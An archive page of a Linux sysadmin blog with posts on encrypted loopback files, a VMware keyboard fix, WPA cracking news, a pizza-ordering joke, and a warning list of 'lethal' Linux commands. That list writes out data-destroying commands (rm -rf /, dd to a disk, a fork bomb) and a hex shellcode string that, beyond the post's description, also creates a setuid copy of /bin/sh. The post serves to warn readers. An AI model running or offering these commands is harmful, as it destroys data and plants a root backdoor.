Archive for the 'hacks' Category

16 GB encrypted candy file

Date: May 5, 2010. Categories: backup, centos, debian, distros, docs, fedora, hacks, linux, shell and ubuntu. Comments

Update: as far as cryptoloop is vulnerable and is not maintained I don’t recommend using below approach for creating encrypted for for those of you who require strong security. Use truecrypt to create encrypted filesystem within a file instead.

passwords.txtToday it came to my mind that it is time to make sensitive information stored on my usb flash drive encrypted but still transportable and easy to use. But I don’t want to have whole my 32 GB usb drive fully encrypted using truecrypt or something similar. It is just toooo slow. I also don’t want to use GPG for uncompressing files and directories every time I would like to read them and then create new GPG compressed file every time I save changes. This eats too much of my time and system resources. At the same time it is necessary to be able to use that usb drive under windows, mac, linux whatever (read/write files) but still have my directory structure with sensitive files encrypted. Here is the solution: create encrypted filesystem within a file named, say, 16GB.candy.bin that could be stored on regular windows formatted usb flash drive and then mounted under Linux using the password.

When it becomes necessary I can mount that 16GB.candy.bin as the regular ext3 filesystem with all those stuff like permissions, ownership etc. that is available on ext3 but not in FAT or NTFS. On my windows formatted flash drive candy takes only 16 GB so I can use the rest of space to store not so sensitive information like mp3, movies or photos. Moreover I on windows or linux to read it.

Let’s create that 16GB.candy.bin file with encrypted ext3 filesystem (read below explanations below carefully before just to copy/paste commands into CLI):

[root@artemn root]# cd /path/to/candy/

[root@artemn root]# modprobe cryptoloop

[root@artemn root]# modprobe aes

[root@artemn root]# dd if=/dev/urandom of=16GB.candy.bin bs=1048576 count=16000

[root@artemn root]# losetup -e aes /dev/loop0 16GB.candy.bin

[root@artemn root]# mkfs.ext3 /dev/loop0

[root@artemn root]# tune2fs -i 0 -c 0 /dev/loop0

Here are some points: using above commands we create encrypted file of 16 GB so if you need to have more or less just change “count=16000″ in dd line. “count=16000″ means 16GB so “count=20″ means 20MB. Path ‘/path/to/candy/’ is for example only so you should change it to real directory that is able to host encrypted file (16 GB in above example). Command losetup is present in most Linux distributions (btw I recommend Ubuntu especially newly released Lucid Lynx) but if it is not use your disro’s packet manager to install it or compile from sources (for super geeks only, Mr. Stallman if you read this article — Hello). Reader, you can replace “/dev/urandom” in dd line with “/dev/zero” that will make that command to finish faster but will lower security level of resulting file (read about AES for better understanding). You will need to enter the password when running losetup command so make sure it safe and long enough like ‘6U2sAsR37Hn8122dGsaPrew1twt’ but not ‘abc123′ or ‘iloveyou’.

Once commands are done you will get 16GB.candy.bin containing encrypted ext3 filesystem. You can store this file where ever you want, say, on a flash drive. If you loose it nobody won’t be able to open it until he (or she!) cracked AES encryption (use long passwords to prevent this). As the next step it is required to mount filesystem and store some files/directories in it:

[root@artemn root]# mkdir -p /mnt/candy

[root@artemn root]# cd /path/to/candy/

[root@artemn root]# mount -t ext3 -o loop,encryption=aes 16GB.candy.bin /mnt/candy

[root@artemn root]# cd /mnt/candy

[root@artemn root]# #save files, edit them, view or anything you want

[root@artemn root]# cd /

[root@artemn root]# umount /mnt/candy

When you unmount 16GB.candy.bin the changes are already saved there so it’s not required to compress and encrypt anything unlike with GPG.

P.S. This post is inspired by Loopback tricks article. Thanks to the author. Good luck!

13 Linux lethal commands

Date: December 3, 2009. Categories: hacks, linux and tips. 30 Comments

dead linuxIn this post I will collect all commands which SHOULD NEVER be executed in Linux. Any of them will cause data loss or corruption, can freeze or hang up running system.

NEVER RUN THESE COMMANDS IN LINUX BOX CLI!

Even if somebody advises you in forum/im to do it.

1. Any of these commands will erase everything from your home directory, root or just will clear up whole disk:

  • sudo rm -rf /
  • rm -rf .*
  • dd if=/dev/zero of=/dev/sda
  • mkfs.ext3 /dev/hda
  • whatever > /dev/hda
  • cd ~; for x in `ls`; do mv -f $x $y; y=$x; done
  • find -type f -mtime +30 -exec mv {} /dev/null \;
  • mv ~ /dev/null
  • mv / /dev/null

2. Causes kernel panic or freezes Linux box:

  • dd if=/dev/random of=/dev/port
  • :( ){:|:&};: #also known as fork bomb

3. This one does the same as “rm -rf /”:

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

4. This one will prevent you from executing commands with root rights:

rm -f /usr/bin/sudo;rm -f /bin/su

If you know any other commands that can damage running Linux system or pose fatal problem to system administrators — just comment it here so I could update this post. Thanks.

Update: See what happens if execute rm -rf / in Ubuntu: http://www.youtube.com/watch?v=wWOjmvWPRvQ

VMware server console keyboard problem in Ubuntu Intrepid Ibex

Date: December 19, 2008. Categories: hacks, linux, tips and ubuntu. 24 Comments

Few days ago I have upgraded my Ubuntu to latest 8.10 (Intrepid Ibex) and found that keyboard just doesn’t work in VMware Server Console. The problem was that I couldn’t use keyboard under guest operating system including Windows, Linux etc. After few hours of research I found simple solution which works for me:

$ setxkbmap
$ echo "xkeymap.nokeycodeMap = true" >> ~/.vmware/config

After this restart vmware-server-console and see if it helps. If not you can see other solutions of the same problem at this site:
http://nthrbldyblg.blogspot.com/2008/06/vmware-and-fubar-keyboard-effect.html

I hope it helps!
Continue reading…

WPA Wi-Fi encryption is now cracked

Date: November 7, 2008. Categories: hacks and news. Comments

Network security researcher Erik Tews found a way to brake TKIP (Temporal Key Integrity Protocol) used by WPA in order to read the data being sent from router to Wi-Fi laptop or PC. It takes from 12 to 15 minutes to crack WPA encryption according to statements made by PacSec conference organizers where Erik will demonstrate the procedure.

PacSec 2008 Conference will be held on November 12/13, 2008, at Aoyama Diamond Hall in Tokyo, Japan. The presentation is planned as “Gone in 900 Seconds, Some Crypto Issues with WPA – Erik Tews”.

WPA (Wi-Fi Protected Area) is widely used to protect many corporate and personal wireless networks. This protocol implements IEEE 802.11i standard and is a successor of WEP algorithm which was cracked in 2001.

Read more here: Once thought safe, WPA Wi-Fi encryption is cracked.

FAQ: How to order pizza from Linux CLI?

Date: August 8, 2008. Categories: hacks, humour, linux and unix. Comments

couple eating pizza linuxQ: How can I order my favourite pizza by using Linux command line interface?

A: Well… You can use Pizza Party application written by Cory Arcangel and Michael Frumin! Here are some features this outstanding application provides:

  • Can order pizza with only a few keystrokes.
  • Can save pizza preferences.
  • Can use batch files for ordering many pizzas.
  • Has easy to use flags for ordering different toppings.
  • Runs on most UNIX-like operating systems.
  • Supports most currently popular topings like “mushrooms”, and “pepperoni”!
  • Unattended / background operation.
  • Pizza Party is distributed under the GNU General Public License.

Download Pizza Party’s initial source code here and python ported version from this link.

P.S. This portion of Friday humour is provided by Royal HeHe2-ness! :)

« Previous Entries
Pages: 1 2 3 Next
Friendly Sites:Who is behind Linux Screw?
GeekyBits³ | Bash Cures Cancer | OMG! Ubuntu!
My SysAd Blog | Web Upd8
ZEPY | Linux config Wiki | Planet Sysadmin
a non-geek's linux notes | Linux Today
Linux HOWTOs, Tutorials & Projects with Adam Palmer | LinuxAlt.Com
 My name is Artem N. (artiomix AT gmail DOT com) and I'm Linux/Unix, Cisco systems engineer. The main idea of Linux Screw is to share relevant knowledge, skills and observations over The Web. Here you can find a lot of information related to different Linux distributions, FreeBSD, IOS as well as a other Open Source around staff. Read more ››